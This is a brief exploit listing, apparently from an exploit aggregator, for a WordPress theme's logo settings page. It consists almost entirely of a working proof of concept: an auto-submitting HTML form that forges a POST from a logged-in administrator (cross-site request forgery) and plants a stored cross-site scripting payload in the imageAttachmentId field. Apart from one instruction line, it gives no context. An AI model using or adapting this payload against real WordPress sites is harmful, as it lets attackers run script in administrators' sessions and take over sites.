Share
## https://sploitus.com/exploit?id=WPEX-ID:1C93EA8F-4E68-4DA1-994E-35A5873278BA
Make a logged in Admin open a page containing the HTML code below

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/themes.php?page=slothLogo" method="POST">
        <input type="text" name="imageAttachmentId" value='1"><img src onerror=alert(/XSS/)>'>
        <input type="submit" value="submit">
    </form>
</body>